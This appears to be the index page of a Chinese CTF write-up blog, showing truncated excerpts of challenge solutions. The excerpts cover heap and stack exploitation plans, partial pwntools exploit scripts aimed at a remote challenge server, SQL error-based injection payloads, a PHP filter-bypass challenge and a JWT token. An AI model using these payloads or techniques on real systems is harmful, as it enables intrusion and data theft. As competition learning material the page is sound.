SkYe231 Blog

做题目遇到的两种 eof 信号需求情况： 发送 eof 之后，后续不需要继续输入（vnctf-White-Give-Flag） 发送 eof 之后，后续还需要继续输入（mtctf-blind） eof 发送后继续输入不用 mtctf-blind 做例子，因为利用 eof 绕过第一层之后，由于题目其他方面而无法 getshell ，用一个 demo 例子（来源）代替： 1234567891011121314#include <stdio.h>#include <stdlib.h>#include <string.h>int main(void) { char buf[24]; while(1) { if(read(0,buf,16)==0) { break; } } read(0,buf,1000); return 0;} 题目要求第一个 read 返回值为 0 ，也就是输入字符串长度为 0 ，才能到达下面的 read 栈溢出漏洞。 ...

baby_focalglibc 2.31 ，没有 PIE ，没有输出功能，开沙盒的堆溢出： 没有输出功能思路基本都是攻击 stdout 泄露出 libc 地址，这条题目分配函数用的是 calloc ，相当于没有 tcache 存在的，攻击思路和 glibc 2.23 一样。然后就是利用 free_hook 栈迁移到堆上的 orw 。 思路 填满 tcache 之后，利用堆溢出形成堆重叠，形成两个指向同一个地址的指针。注意需要在第一个 unsortedbin 前面布置一个堆，用来修改 size 来绕过保护。 两个同一地址的指针，在 fastbin 写入 main_arena_xx 地址，爆破 1/16 到 stdout 上方，利用错位构造出符合 fastbin 的 size 位。 这篇文章末尾中有提及：http://blog.eonew.cn/archives/1190 修复 unsortedbin 恢复分配释放功能。利用堆溢出劫持 fastbin fd 指针将堆分配到堆指针数组（需要提前布置 size 绕过保护），实现任意地址写。 将 free_hook 劫持为 puts ...

5cef23f373e591f73b0780f44e533ed0d3ed819ed94539aacbd49d448d83d203c86138188432ed081fb96647b11f4e3a368dbff21a107c0bf56a84e883b9e9e33008f6937bc89ddf2c43515884639c17b16be8fc8d7c60ab3918a7666f8afbdfd6ef22afa6448ec5230e4cbdb205b443dc1dce78bc1f81489eb2b8689922cc7ffcfa01b6870f03609a33ebed6664c0c9c091c5067672323ad3d5093313f6da15edc0464f67f35418be11e4d2bd27518f430de355636dfb2ad3ea81d4b2c0892aaa2a5f82c5966cbfdc30f29fb4152022511dae302e9ee3fc12b9589ca31fd55efaf2500ada4f88ae175f93a3366819c72dbf1cc7ddf26ebfa ...

两个题目都是无输出堆题，最近一次比赛在 nepctf 遇到：https://www.mrskye.cn/archives/bdb75c49/#sooooeasy 思路方法概述：https://www.jianshu.com/p/fe28639e406e BabyNote题目是基于 glibc 2.31 的菜单堆题。 漏洞出现在 free 之后没有置零指针导致的 UAF ： 程序没有输出函数，倒是有一个提示的函数 gift 函数，输出堆地址最低两个字节，没用明白，到最后也不关他的事情。 思路： 利用 tcache double 和 scanf 输出长字符串触发 malloc_consolidate 获取 main_arena 地址 爆破倒数第四个数字，将堆分配到 stdout 结构体上，修改 flag 和 write_base 地址泄露出 libc 地址 利用 tcache dup get shell 遇到的问题就是直接之前 libc 2.23 的 payload 去打的话没有回显出 libc 地址，原来的 payload ： 1p64(0x0FBAD1887) +p64 ...

Webeasy_sql单引号直接报错，试了一下updatexml直接可以报错注入了。 注到表名时过滤了information以及其他等效替代的表，测了一下有flag表，然后就开始无列名注入了。 1uname=admin&passwd=123') or (updatexml(1,concat(0x7e,(select * from(select * from flag a join (select * from flag)b using(id))c),0x7e),1)) %23&Submit=%E7%99%BB%E5%BD%95 注出来前两个字段为id跟no，注出来flag位于40b380c6-1208-4216-b5a8-1f550a5a8be4。 1uname=admin&passwd=123') or (updatexml(1,concat(0x7e,(select * from(select * from flag a join (select * from flag)b using(id ...

M781234567891011121314151617181920212223from pwn import *context.log_level = 'debug'context.terminal = ['tmux','sp','-h']# p = process("./M78")p = remote("39.96.88.40",7010)libc = ELF("/lib/i386-linux-gnu/libc.so.6")elf = ELF("./M78")p.sendlineafter('?','1')p.recvuntil("building\n")p.send('a'*25)p.recvuntil("password\n")# gdb.attach(p,"b *0x080492B0")payload ...

easypwn新建的堆块时，存在 off by one phone number 和 name 写入函数使用的是 scanf 。scanf 是危险函数，可以一直输入直到遇到 \n 。 指针存放地址在 name 后面，可以通过溢出修改指针地址。 EXP123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657from pwn import *context.log_level = 'debug'context.terminal = ['tmux','sp','-h']def cmd(cmd): p.recvuntil(">>") p.sendline(str(cmd))def add(number,name,size,des): cmd(1) p.sendlineafter("numbe ...

Webfind_it.1ndexx.php.swp 源码： 12345678910111213141516171819202122232425<?php#Really easy...$file=fopen("flag.php","r") or die("Unable 2 open!");$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));$hack=fopen("hack.php","w") or die("Unable 2 open");$a=$_GET['code'];if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\ ...

2021 CVVD首届车联网漏洞挖掘赛线上初赛G2mtu Writeupjwt原题 https://blog.csdn.net/weixin_46676743/article/details/113726655 带着 1Authorization:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImVicmVidW5hIiwicGFzc3dvcmQiOiIiLCJhZG1pbiI6ImdlaHIiLCJpYXQiOjE2MjA0NTgwMzJ9.QkpCPfCtmMmeEYRoLFzzT8ag7mIaIPIcbZLZABqnXHw 访问/admin CAN总线4通过诊断服务报文使ECU停止发送网络管理报文，但仍能接收应用报文，请写出诊断服务报文数据场的前4字节。 参考https://blog.csdn.net/usstmiracle/article/details/109214586 0x04 应用层有四字节 0x28 CommunicationControl 0x01 enableRxAndDisableTx（激活接收和关 ...

bank最直观就是格式化字符串漏洞，用来读取堆上的 flag ： 进入分支需要经过一个 strcmp 的校验，这里的写法是：if ( !strcmp(s1, password) ) ，需要返回值是 0 ，多了个取反符号，用截断绕不过去 问题是出在生成密码的地方，生成密码后用 fgets 读入，都是 gets 家族的函数，遇到 \n 就停止输入，当生成的密码首位是 \n ，那么密码全为 0x00 。一开始没发现，正常时用 read 读入就没有这个问题。 exp1234567891011121314151617181920212223242526from pwn import *context.log_level = 'debug'context.terminal = ['tmux','sp','-h']elf = ELF("./bank")# gdb.attach(p,"b *0x4013BF")# gdb.attach(p,"b *0x40130C&quo ...